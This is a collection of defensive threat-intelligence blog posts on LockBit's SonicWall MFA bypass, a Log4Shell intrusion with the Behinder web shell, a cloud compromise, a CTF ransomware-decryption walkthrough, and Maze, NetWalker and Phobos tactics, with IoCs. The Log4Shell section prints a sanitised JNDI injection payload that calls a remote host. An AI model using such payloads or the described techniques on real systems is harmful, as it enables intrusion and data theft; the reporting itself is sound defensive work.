Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA

Increasing Capabilities of LockBit 2.0 Gang Per Our Incident Response Experience in Q1 2022 Impacts Over One Hundred Hong Kong and Macau Organisations; Exploit Acknowledged by SonicWall as CVE-2022-22279

In the first quarter of 2022, DarkLab responded to several ransomware incidents impacting organisations in the financial services, real estate, and manufacturing sectors across Hong Kong, China and Asia Pacific. In all such incidents, the presence of the LockBit executable file, .lockbit extension files, and the StealBit malware suggests that affiliates of the cybercriminal group that operates the LockBit 2.0 Ransomware-as-a-Service (RaaS) was likely behind the incidents.

LockBit 2.0 RaaS is a well-documented group with established tactics, techniques and procedures (TTPs) that has been active since 2019.[1] During our incident response investigations, we found LockBit affiliates exploiting two victims’ SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSLVPN) appliance to establish a foothold in their networks. In the first instance, the affiliate exploited a known SQL injection (SQLi) vulnerability to obtain valid usernames and passwords. Given the multi-factor authentication (MFA) access control was not enabled, they were able to achieve initial access relatively easily. In the second instance, the affiliate performed follow-up actions to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the MFA access control.

In this blog post we will report on their novel technique to exploit SonicWall SSLVPN appliances and bypass MFA. According to results from open source internet search engines, over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances. This exploit disclosed by DarkLab has since been acknowledged by SonicWall as CVE-2022-22279.

A second blog post will then outline the LockBit affiliates’ TTPs as observed in our incident response experience. The final blog post will explore the potential factors that enables the LockBit RaaS group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Initial Access

The typical modus operandi of LockBit 2.0 affiliates is to gain access to a victim network by exploiting known vulnerabilities of public-facing services, including vulnerable SSLVPN. In particular, CVE-2018-13379 [2] has been the preferred vulnerability in many incidents, including those DarkLab responded to in January and February 2022. The vulnerability is several years old, and LockBit 2.0 affiliates were still able to capitalise on the exploit that allows for unauthenticated users to download system files through crafted HTTP resources requests. Other affiliates have been reported to gain initial access by conducting Remote Desktop Protocol (RDP) brute forcing[3] or through purchasing access to compromised servers via underground markets.[4]

However, in two incidents that DarkLab responded to in March 2022 we observed a new infection vector.  Affiliates were observed to exploit a known but relatively obscure SQLi vulnerability – either CVE-2019-7481 [5] or CVE-2021-20028 [6] – in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance to the affiliate’s local endpoint. Retrieved data included valid usernames, passwords, and the TOTP. In doing so, the affiliates could circumvent the MFA access control, impersonate any user to gain initial access, and subsequently deploy ransomware.

Figure 1 – LockBit’s initial attack chain

The latter incidents we responded to in March 2022 were noteworthy for two reasons. First, LockBit affiliates were not reported to have exploited SonicWall SSLVPN products in the past. Second, this was the first publicly observed instance that the known SQLi vulnerability could be exploited by threat actors to extract the TOTP SHA-1 tokens of onboarded users. Affiliates could then generate the QR code containing the required information to generate one time passwords (OTP) in an authenticator app of their choice.[7] This proved to be an innovative way to circumvent the existing MFA access controls. The observation of the exploitation suggests the affiliates of LockBit now have additional tools in their arsenal, and indicates the importance they place in continuous improvement as the group looks to differentiate itself from competitors.

Impact to Hong Kong and Macau

DarkLab replicated and verified the novel exploitation method of the post-authentication vulnerability through internal testing of several known impacted SonicWall SSLVPN firmware. We have shared all relevant details, including the technical exploit code, with the SonicWall Product Security Incident Response Team (PSIRT) in March 2022 to ensure organisations are protected. We will not publicly disclose exact exploitation details to avoid replication by malicious actors.

Per subsequent communications with SonicWall PSIRT, we understood that the upgrades to SonicWall SMA firmware 10.2.0.7-34sv or above, and 9.0.0.10-28sv or above in February 2021 to address CVE-2021-20016 included comprehensive code-strengthening that proactively prevented malicious attackers from exploiting this vulnerability to circumvent the MFA access control.[8] On 12 April 2022, SonicWall PSIRT released the following advisory acknowledging the vulnerability CVE-2022-22279 which we had disclosed.[9]

As of the time of writing, we have not observed from our deep and dark web monitoring any specific intentions by threat actors to leverage this post-authentication vulnerability to target organisations in Hong Kong and Macau. However, we observed that Russian-speaking threat actors had been discussing this vulnerability in early February 2022, with posts from two underground forums – exploit[.]in and xss.[.]is – containing conversation details of purchasing the exploit code and outlining at a high-level the follow-up actions that can be taken to extract the TOTP from the active sessionid

Figure 2 – Screenshot of exploit[.]in underground forum
Figure 3 – Screenshot of xss[.]is underground forum

As a result of the LockBit incidents and various hacker chatter, we were concerned that local organisations may have missed SonicWall PSIRT’s advisory note; after all, we still observed compromises that resulted from the exploitation of CVE-2018-13379 on unpatched Fortinet SSLVPN appliances in February 2022. To that end, we conducted a passive, non-intrusive scan of both CVE-2019-7481 or CVE-2021-20028 on the full Internet Protocol address (IP address) range of Hong Kong and Macau. The preliminary results indicated that at least 100 organisations were vulnerable to CVE-2021-20028, with half of those also vulnerable to CVE-2019-7481.

DarkLab has since proactively contacted dozens of potentially affected organisations to alert them of the potential risks they faced. However, given there were a series of critical vulnerabilities pertaining to SonicWall SSLVPN appliances released in June 2021, it is likely that those may be exploited through other innovative methods by threat actors. For example, the Cybersecurity & Infrastructure Security Agency (CISA) listed CVE-2021-20016 as another SQLi vulnerability that allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information in SMA100 build version 10.x. [10], which aligned with our communication with SonicWall’s PSIRT. We foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability.

CVE NumberProductVulnerability NameDate Added to CatalogueShort Description
CVE-2021-20021SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
CVE-2021-20022SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to upload an arbitrary file to the remote host.
CVE-2021-20023SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to read an arbitrary file on the remote host.
CVE-2021-20016SonicWall SSLVPN SMA100SQL Injection Vulnerability3 November 2021A vulnerability in SMA100 build version 10.x allows a remote unauthenticated attacker to perform SQL query to access username, password and other session related information.
CVE-2021-20018SMA 100 AppliancesStack-Based Buffer Overflow Vulnerability28 January 2022SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
CVE-2021-20028SonicWall SRASQL Injection Vulnerability28 March 2022SRA products contain an improper neutralisation of a SQL Command leading to SQL injection.
Table 1 – CISA known exploited vulnerabilities catalogue listing various critical SonicWall CVEs that were being exploited in the wild as of 2 April 2022

The ongoing evolution of TTPs allowed LockBit’s affiliates to become the most prolific ransomware actors in 2022. Between 1 January and 31 March 2022, the group claimed 223 victims on their dark web leak site, compared to Conti’s 125. This equates to more than one-third of all known ransomware incidents for Q1 2022. To put it in another way, over the same period LockBit’s affiliates claimed almost 10 percent more victims than the other 24 known ransomware groups combined (223 compared to 164). LockBit’s reported activities have also increased over the course of the first three months of 2022. The gang claimed 112 victims in March, while it published details of 111 companies in the previous two months combined. This suggest an ongoing trend highlighting how LockBit will likely remain the most active ransomware-as-a-service offering for the coming months.

Figure 4 – Number of victims published on ransomware dark web leak sites between 1 January 2022 and 31 March 2022

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. At least 100 organisations in Hong Kong and Macau are at potential immediate risk, and we foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability. We will continue to monitor the situation and assist organisations as needed. In the next blog post, we will also share further details on the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience with reference to the MITRE ATT&CK Framework, such that organisations can better prevent and detect malicious activities related to this RaaS group.

Recommendations

For organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN, we recommend the following actions immediately in the following order:

  • Upgrade legacy SRA SSLVPN device(s) running firmware 8.x given they are not supported by SonicWall; apply patches to the impacted versions of the 9.x or 10.x firmware.
  • Reset all user account Active Directory credentials that had previously authenticated via the SonicWall SRA SSLVPN. In particular, the Active Directory credentials that is tied to the SonicWall SRA device for authentication purpose should be changed.
  • Re-bind users’ second authentication factor (e.g., Google or Microsoft Authenticator) app with an updated TOTP, and ensure that users store their newly generated backup codes securely.[11]
  • Review the privileges granted to the Active Directory account tied to the SonicWall SRA device for user authentication purpose, and remove excess permissions where possible to adhere to the principle of least privilege. In general, Domain Administrator privilege should not be used.
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforce network segmentation to tighten access to key servers).

Meanwhile, defending against undisclosed exploits are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed:

  • Require multi-factor authentication for all services to the extent possible, especially on external remote services. 
  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically:
    • Maintain regular cybersecurity patching hygiene practices, including a robust baseline that patched known exploited vulnerabilities and aims to reduce known attack surface. 
    • Leverage cyber threat intelligence to prioritise the remediation scale and timeline on a risk-based approach, through the incorporation of indications and warnings regarding trending threats per available proof-of-concept code, active exploitation by threat actors, and Darknet chatter.
  • Maintain “tertiary” offline backups (i.e., tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be atop of your existing secondary data backups that should adopt security best practices, in particular network segmentation with your production and/or primary site.
  • Develop and regularly test the business continuity plan, ensuring that the entire backup, restoration and recovery lifecycle is drilled to ensure the organisation’s operations are not severely interrupted.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Impact: Data Encrypted for Impact (T1486)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

IndicatorType
7fcb724c6f5c392525e287c0728dbeb0MD5
adead34f060586f85114cd5222e8b3a277d563bdSHA-1
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7SHA-256
LockBit_9C11F98C309ECD01.exeExecutable File
.lockbitEncrypted Files Extension
91.219.212[.]214IPv4 Address
5.206.224[.]246IPv4 Address
51.91.221[.]111IPv4 Address
213.186.33[.]5IPv4 Address
194.195.91[.]29IPv4 Address

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

A look Behinder the scene

Popular web shell exploited after Log4Shell for data theft

DarkLab recently responded to an incident affecting a Hong Kong organisation in the retail sector. Threat actors exploited the vulnerability CVE-2021-44228 in the Apache Log4j library, also known as Log4Shell, as initial infection vector (link). While we observed multiple attempted exploitation of Log4Shell against our Managed Security Service clients since its initial reveal on 10 December 2021, this was the first instance where we observed Log4Shell exploited in a prolonged network intrusion whose aim was not the typical crypto-mining or ransomware deployment for financial gain.

After initial access via Log4Shell, the actor dropped the Behinder web shell on the victim’s public-facing web servers. They exploited this access sporadically over a period of 51 days to retrieve additional information from backend database servers, which led to an increase in network activity and their subsequent discovery.

Initial access and web shell deployment  

Log4Shell is a software vulnerability in the Apache Log4j 2, a popular Java library to extend logging capabilities in applications. The vulnerability enables a remote attacker to gain the ability to execute arbitrary code and take control of a device running vulnerable versions of Apache Log4j 2.

In this instance, we observed that the adversary performed manual probing to identify an entry point in the login page of a victim’s public-facing web server. The adversary spent several hours repeatedly interacting with the vulnerable webpage. Such prolonged interaction with the identified target suggest attackers were not just running automated scripts like we have seen many opportunistic threat actors do, but rather had a degree of interest in compromising this victim.

# Entry in Nginx
x.x.x.x – – [1/Jan/2022:08:00:00 +0000] “POST /login/logincheck HTTP/1.1” 302 0 “[https:]

//www.victim.com/victim/login” “Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36” “x.x.x.x”
# Corresponding entry in Apache Log4j log
INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’
INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’

Fig 1 – log sample showing threat actors’ exploitation attempt. The sample has been sanitised to maintain the victim’s anonymity.

Once successfully exploited Log4Shell, they dropped the Behinder web shell (or “冰蝎”). Behinder is a versatile, multi-platform web shell created by a Chinese-speaking developer and popular within the hacking community in the same country (link). This web shell allows for AES-encrypted command and control (C2) traffic (link), which helped the threat actor maintain stealth and persistence in their victim’s environment.

Fig 2 – example of Behinder web shell’s user interface, likely used by the attacker to interact with the victim’s environment

The threat actor then performed enumeration of the internal system with the web shell and obtained the application credentials to access the backend application database. In this database the threat actor issued search queries via the web shell. These used terms revealing their interest in customer data such as customers’ names, email addresses and residential addresses. At this point, limited log availability did not allow us to determine the amount and nature of data accessed and exfiltrated.

Intruders interacted with the compromised servers via throwaway infrastructure. They used Vultr Virtual Private Servers (VPS) hosted in South Korea for several consecutive days, followed by VPS hosted in Japan in the subsequent network spikes. Adversaries typically rent VPS from service providers such as Vultr to host their C2 servers while masking the origin of their source IP addresses, thereby preventing security researchers to easily trace and link their infrastructure with previously known intrusions.

Who is Behinder the intrusion?  

We do not have enough evidence to confidently attribute the intrusion to a known threat actor group. The large amount of customers’ personally identifiable information the victim held was of likely interest to financially and politically-motivated threat actors alike.

However, the use the Behinder web shell strongly suggests a Chinese-speaking threat actor. We also noticed how a recent open source paper (link) on the Earth Lusca group describes the actor as using Vultr VPS infrastructure and dropping Behinder, which match our observed activity. Notably, Earth Lusca has also previously targeted Hong Kong organisations. However, this allegedly state-sponsored group routinely exploits malware like Winnti and Cobalt Strike which we have not seen in this incident. This, and the relatively generic TTPs observed, hinders any confident attribution assessment.

Recommendations

  • Echoing our 2022 predictions advice, organisations should profile their attack surface to understand services open, technologies used, and known vulnerabilities. Patching programmes should enable a threat-based prioritisation of missing security patches and facilitate rapid deployment of critical security patches within aggressive timeframes.
  • Build a robust enterprise security architecture with layered defense to address potential security risks to critical assets (i.e., data, infrastructure, applications).
  • Enable security audit logs to ensure maximum visibility on existing security monitoring. In particular, ensure that logs’ retention period is sufficient to support after-the-fact investigations of potential incidents.
  • Implement specific mitigations against Log4Shell and related Log4j-related vulnerabilities including blocking specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic

MITRE ATT&CK TTPs Leveraged

  • Reconnaissance: Active Scanning (T1595)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Network Service Scanning (T1046)
  • Collection: Data from Local System (T1005)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)
  • Command and Control: Encrypted Channel – Symmetric Cryptography (T1573.001)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)

Indicators of Compromise (IOCs)

Feel free to contact us at [threatintel at darklab dot hk] for the full set of Indicators of Compromise (IOCs).

Trouble in Paradise

A case study of Cloud compromise

Many organisations are increasingly moving to cloud solutions to solve their hosting needs, but outsourcing workload should not imply outsourcing security as well. The importance of security the cloud was recently highlighted by targeting of Microsoft Azure environments by Nobellium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably exploited stolen SAML certificates for vertical movement, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also pose a threat to companies’ services in the cloud. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team has helped a South Asian client in the media sector to remediate an incident involving multiple cloud environments breaches, a case study we think can help organisations better plan for secure implementations of their cloud environments.

The incident originated from a likely exploitation of a known remote code execution vulnerability in a Jenkins instance, an open source software development automation server. The server was hosted in an Amazon Web Service (AWS) environment and had a hardcoded root access key. With that, the threat actor was able to roam the compromised environment undetected for four months. Logs availability has been an issue due to the lack of CloudTrail log retention but we know that the threat actor created multiple IAM user accounts and accessed internal data, including those stored in S3 buckets via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a jumping spot to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines in new EC2  instances  in the compromised environment to scan and exploit external IP addresses. The did so using T.2 micro sizing to avoid spikes in usage and remain hidden. The attacker deployed the additional EC2 instances in a different AWS region than that used by the victim, an anomaly that we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

From AWS, the threat actor managed to access a FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a compromised hard-coded credential found in one of the configuration files in their BitBucket repository, also suspected to be compromised. After thorough environment and users’ enumeration, the attacker was able to obtain the password for another G-Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing the GCP,  threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, and the backup copies. Fortunately, AWS retained some copies of the deleted backups which were able to provide to the victim organisation.

However, while the victim restored their AWS system they were not aware to reset the root access key. Unsurprisingly, the attacker quickly re-established a presence in their cloud and a few days later they re-deleted the production environment, although no ransom demand was recorded. This was when our incident response team was called to help.

Assessment

Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with a relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still pose significant operational damage to a large company by deleting their production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this was not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help indeitifyuing supicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring metrics mapped against Mitre ATT&CK tactics that we recommend organisations implement to AWS Config, Lambda, or their choice of CSPM platforms for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

TacticTechnique (custom)Log Source
Initial accessAWS user login failed multiple timesCloudTrail
Initial accessMultiple worldwide successful console login GuardDuty
Initial accessPotential Web scanning activities with multiple web server 400 error from same the source IPWeb access log
Privilege EscalationAWS “AssumeRole” from rare external AWS accountCloudTrail
DiscoveryAWS potential IAM enumeration ActivitiesCloudTrail
Defense Evasion/ PersistenceCreate/Update managed policy with excessive permissionCloudTrail
ImpactAWS Access Key EnabledCloudTrail
ExfiltrationEgress rule added to a security groupCloudTrail

Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture the flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists to decrypt the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only the snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com ,  X is your team number

After connecting via RDP to the machine, we can see another user named sysadmin by navigating around the file system. On that user desktop, the following are found :

  • Ransomware affected file with extension HKADYYY
  • Ransom note HKADYYY-README, containing a flag

hackaday{y0u_hAve_b33n_R@ns0meD!}

Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the windows event logs, we notice a suspicious code snippet under powershell – large base64 payload (powershell with -e option).

The following two values are found by decoding the base64

  • Caller script : . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag

hackaday{wHo$_G0T_my_r@r1Sonn?!}

Ransomware Attack Again 3 (50 pts, 2 solves)

Description: sometimes there is public research on the ransomware behavior which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link : https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a small summary of the ransomware, a decryption routine, and the third flag hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values :

  1. IV : Given by base64 string located in the loader : MTIzNDU2Nzg5MDEyMzQ1Ng==
  • Key-seed : random two-digit and the SID (obtained by checking the user that executed the ransomware i.e. sysadmin)

00S-1-5-21-1580626154-3826959220-856111413-500 to 99S-1-5-21-1580626154-3826959220-856111413-500

The following decryption code is implemented with the IV and Key (two digit is 99):

$IV = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key) 
$decryptor = $aesManaged.CreateDecryptor();
$fileToDecrypt = "C:\path\to\encrypted\file.HKADYYY"
$encryptedFile = [System.IO.File]::ReadAllBytes($fileToDecrypt)
$bytes = $encryptedFile
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[System.IO.File]::WriteAllBytes($fileToDecrypt,$unencryptedData)
Rename-Item -Path $fileToDecrypt -NewName ($fileToDecrypt.Substring(0, ($fileToDecrypt.Length - 8)))
$aesManaged.Dispose() 

Using the routine to decrypt the file:

Decryption routine will reveal the final flag

hackaday{fr33d!fin@l1y~}

That’s is for this blog series, we hope you enjoyed reading and looking forward to seeing you at Hackaday 2021!

Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminals’ innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors will likely be driven to explore new ways to differentiate their offering in the illicit cybercriminal market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers emerged with new a tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims to first shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so they may differ in the attack tactics exploited. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter cybercriminal candidate screening is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly more likely entry points than untargeted phishing emails.

The rise of crypt and leak

Since the end 2019, some ransomware groups have begun threatening to release sensitive victim’s data if their ransomware demand are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or on tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.

Maze

Maze ransomware appeared in May 2019, but it began leaking victim’s data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up tor hidden service counterpart to avoid take down by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site

NetWalker

NetWalker ransomware is based on a previous variant called Mailto and was rebranded in its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have gained millions of US dollars since March, although it remains unclear whether this is just an exaggeration to attract more affiliates to their program or not.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from their website overtime, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site, more have likely been targeted and not posted online or deleted from existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and Ransomware exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high profile targets, including by Sodinokibi against Travelex in January.

In both cases, the remote access technology SSLVPN was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers would conduct enumeration and other reconnaissance activities by, for instance, searching for password files in share folders. The attackers will also actively look for idle and vulnerable servers with intentions to expand their foothold.

During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include windows administration tools like psexec, open source tools for lateral movement like crackmapexec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners. 

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network end points. Similarly, creation of new domain administrator accounts allowed them persistence on the network. 

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoints’ protection software, and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken their endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter would ensure that the ransomware would also spread to endpoints after they shut down or if they joined the network at a later time.

Conclusion

The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure makes ransomware leaks one of the most significant threats to companies, regardless of sectors. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how the SAR’s threat landscape is closely associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability but it is not an effective mitigation against the increasing threat of ransomware data leak. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

HashFile nameDescription
c45ebccb7dc2bbc34c51c82c3eba6448apply.ps1Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4csystem.dllMaze ransowmare
0e7d5d16e03393605f5f4862f1b9cc37crackmapexec.exeLateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164syspool.exeLightweight network scanner
696bb8648eceaa187cbc1f06205a23cecity.exeNetWalker ransomware
84ddf23d4307b1a9989352f4845d0edecity.ps1NetWalker PowerShell script

Phobos ransomware

Incidents affecting Hong Kong organisations

In the last two months DarkLab Incident Response and Threat Intelligence teams observed multiple incidents in Hong Kong involving the Phobos ransomware variant.

There is no explicit indications that these incidents are part of a campaign targeting Hong Kong. Rather, they are likely due to Phobos’ prevalence in the cybercriminal underground. Nonetheless, the similarities in observed tactics, techniques and procedures (TTPs), and in the ransomware deployed prompted us to release this alert to help companies improve their timely detection and response to this threat.

Intrusions analysis

Phobos shares many similarities with the Dharma ransomware, and has been sold as  ransomware-as-a-service on the cybercriminal underground since at least December 2018. This means that even low skilled threat actors can rent the malware from its developers and spread it via whatever means they have access to. 

According to our DarkLab’s incident investigations, exploitation of remote desktop protocol (RDP) servers and their credentials are the most common infection vectors. In particular, we observed RDP bruteforcing and exploitation of weak password policies as the most frequent attack vectors. Such TTPs match previously reported instances of Phobos intrusions worldwide.

